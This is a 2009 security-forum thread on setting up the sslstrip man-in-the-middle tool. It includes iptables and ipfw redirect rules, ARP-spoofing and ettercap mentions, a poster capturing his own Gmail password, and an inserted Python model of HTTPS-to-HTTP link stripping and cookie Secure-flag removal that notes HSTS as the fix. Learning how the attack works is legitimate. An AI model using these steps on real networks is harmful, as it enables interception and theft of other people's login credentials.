
SSLStrip



#1 phr34kc0der

    SUPR3M3 31337 Mack Daddy P1MP

  • Members
  • 469 posts
  • Gender:Male

Posted 24 February 2009 - 06:48 PM

I'm sure most of you have read about sslstrip. I was trying to play with it earlier but, well, my iptables skills are very lacking. I understand that the documentation was probably on the sparse side for a reason (keep script kiddies away), but if someone can give me some pointers I'd be grateful.

And please don't point me to Google. I do plan on playing with iptables in depth, but at a later date. ATM I'm interested in wifi attacks and want to play with a few before moving on.

BTW, I could not find any blog posts, guides or tutorials. If someone wrote one, it would probably get to the top of Google quite quickly (although you would have to deal with the guilt of helping skiddies steal Facebook passwords :P)

#2 Ohm

    I could have written a book with all of these posts

  • Members
  • 3,209 posts
  • Gender:Male
  • Location:Maine, USA

Posted 24 February 2009 - 10:52 PM

After a very confusing mistake, I've gotten this running.

I'm doing something a little different. I just want to try this on localhost, so I'm not doing any ARP spoofing. Instead, I'm just forwarding requests to port 80 to port 10000. Of course, this created a very confusing error. My test curl request was redirected to port 10000, and sslstrip got it. It then tried to connect to the server on port 80, which was then redirected to itself. It sat there making new threads until it died. I was debugging Python before I realized what was going on.

Anyway, here's my iptables command line.

sudo iptables -t nat -A OUTPUT -p tcp -m owner --uid-owner test --destination-port 80 -j REDIRECT --to-port 10000

The easiest way was to just make a user called test and filter only connection requests made by the test user.

I'm about to play with this further, I haven't even begun to start doing any ssl testing.

#3 Ohm

    I could have written a book with all of these posts

  • Members
  • 3,209 posts
  • Gender:Male
  • Location:Maine, USA

Posted 24 February 2009 - 11:05 PM

And it is working. Running firefox as the test user (using the ssh trick), I just captured my own gmail password.

ssh test@localhost firefox


#4 phr34kc0der

    SUPR3M3 31337 Mack Daddy P1MP

  • Members
  • 469 posts
  • Gender:Male

Posted 25 February 2009 - 01:27 PM

Thanks Ohm. Haven't had a chance to play some more but I will do.

#5 Cryptik Hex

    elite

  • Members
  • 101 posts
  • Location:Pasadena CA

Posted 25 February 2009 - 10:38 PM

This sounds interesting! Thanks for letting me in on this (surprised I hadn't heard about it) but yea I'm definitely going to learn more about the inner workings :D

#6 Ohm

    I could have written a book with all of these posts

  • Members
  • 3,209 posts
  • Gender:Male
  • Location:Maine, USA

Posted 26 February 2009 - 12:38 AM

Oops, I made a mistake in the ssh thing.

ssh -X test@localhost firefox

This is still not perfect. My previous advice of opening up https://gmail.google.com/ still protects you (but only on gmail). This relies on having cleartext HTTP to mangle URLs to HTTPS form submissions. If the connection was initiated as HTTPS to begin with, there's nothing it can do.
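
What Ohm describes in this post is the whole trick, so here is a small Python model of it as an added example; it is not code from this thread or from sslstrip itself. The proxy sits on the victim's cleartext HTTP, rewrites every https:// reference in a response to http://, remembers which URLs it downgraded, and fetches those over HTTPS on the server side, so the victim talks plaintext while the site still sees TLS. The class and function names (StripProxy, strip_response, upstream_scheme, demo), the example.com hosts and the sample login response are this example's own assumptions, and it works on strings rather than on sockets.

```python
import re

# Matches an absolute https:// URL: a host, then an optional path that stops at
# whitespace or a quote/angle bracket (good enough for hrefs and form actions).
HTTPS_URL = re.compile(r"""https://([A-Za-z0-9.-]+)(/[^\s"'<>]*)?""")


class StripProxy:
    """Model of an SSL-stripping proxy sitting on a victim's cleartext HTTP."""

    def __init__(self):
        # (host, path) pairs already rewritten; the real origin is HTTPS.
        self.stripped = set()

    def _downgrade(self, match):
        host = match.group(1)
        path = match.group(2) or "/"
        self.stripped.add((host.lower(), path))
        return "http://" + host + (match.group(2) or "")

    def strip_response(self, headers, body):
        """Rewrite a server response before it reaches the victim.

        Every https:// link or form action becomes http://, Location headers
        are downgraded the same way, and the Secure flag is removed from
        cookies so the browser will send them over the plaintext connection.
        """
        out = {}
        for name, value in headers.items():
            lname = name.lower()
            if lname == "location":
                value = HTTPS_URL.sub(self._downgrade, value)
            elif lname == "set-cookie":
                value = re.sub(r";\s*secure\b", "", value, flags=re.IGNORECASE)
            out[name] = value
        return out, HTTPS_URL.sub(self._downgrade, body)

    def upstream_scheme(self, client_scheme, host, path):
        """Decide how to fetch a victim's request from the real server.

        Returns "https" for a URL stripped earlier (the site still sees TLS,
        so the login succeeds), "http" for anything else, and None when the
        victim connected with TLS themselves: then the proxy only ever sees
        ciphertext, which is why typing https:// by hand defeats the attack.
        """
        if client_scheme == "https":
            return None
        if (host.lower(), path) in self.stripped:
            return "https"
        return "http"


def demo():
    """Run one stripped login flow on a constructed response and return the results."""
    proxy = StripProxy()
    # Constructed sample response from a login page that was served over plain HTTP.
    headers = {
        "Content-Type": "text/html",
        "Set-Cookie": "sid=abc123; Secure; HttpOnly",
    }
    body = ('<form action="https://login.example.com/auth" method="post">'
            '<a href="https://www.example.com/account">account</a>')
    new_headers, new_body = proxy.strip_response(headers, body)
    return {
        "body": new_body,
        "cookie": new_headers["Set-Cookie"],
        "post_auth": proxy.upstream_scheme("http", "login.example.com", "/auth"),
        "other_path": proxy.upstream_scheme("http", "login.example.com", "/other"),
        "typed_https": proxy.upstream_scheme("https", "login.example.com", "/auth"),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Running it shows the form action and link downgraded, the cookie's Secure flag gone, the stripped /auth path being relayed over HTTPS while an untouched path goes out as plain HTTP, and a victim-initiated https:// connection yielding nothing to rewrite. The real tool tracked stripped URLs per client rather than in one global set, but the dependency is the same: the rewrite needs a plaintext response to work on first, which is exactly the gap that the later HSTS header closes for sites that send it.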

#7 phr34kc0der

    SUPR3M3 31337 Mack Daddy P1MP

  • Members
  • 469 posts
  • Gender:Male

Posted 26 February 2009 - 01:30 PM

It seems version 0.2 has been released (not sure which version you were using Ohm). This one has a MUCH better readme.

#8 Ohm

    I could have written a book with all of these posts

  • Members
  • 3,209 posts
  • Gender:Male
  • Location:Maine, USA

Posted 26 February 2009 - 09:07 PM

I was using 0.1, but I'm done playing with it now. I figured it out myself anyway :P

#9 duper

    Dangerous free thinker

  • Members
  • 816 posts
  • Location:NYC

Posted 03 March 2009 - 01:32 PM

http://djtechnocrat....acked-then.html

Didn't know the author was forced to release because they got hacked... How ironic.

#10 Ohm

    I could have written a book with all of these posts

  • Members
  • 3,209 posts
  • Gender:Male
  • Location:Maine, USA

Posted 08 March 2009 - 07:29 PM

They make it sound like it was some epic hack or the URL was "sniffed" while he accessed it or something. Someone just guessed the URL is all.

Also, I got this running with ettercap with no problems at all. In all it only took me about 5 minutes, including figuring out how to use ettercap (which I'd never used before :P). The iptables command was definitely easier as well, since I didn't have to weed out unwanted traffic from my own computer.

iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 10000


#11 SUMMERZFUN

    the 0ne

  • Members
  • 1 posts

Posted 25 March 2009 - 12:39 AM

Hi
Trying this on Mac, I tried using the ipfw command (as OS X doesn't support iptables). My ipfw: add fwd 127.0.0.1,80 tcp from any to any 10000. If anyone is familiar with ipfw in OS X, could you please advise? I think this must be the issue, as I got arpspoof working (downloaded MacPorts and dsniff), also set the kernel sysctl forwarding to 1, and this was the remaining step.
Also, nothing was contained in the secret file when I signed onto Yahoo from my other laptop.

Thank you very much for any OS X information.



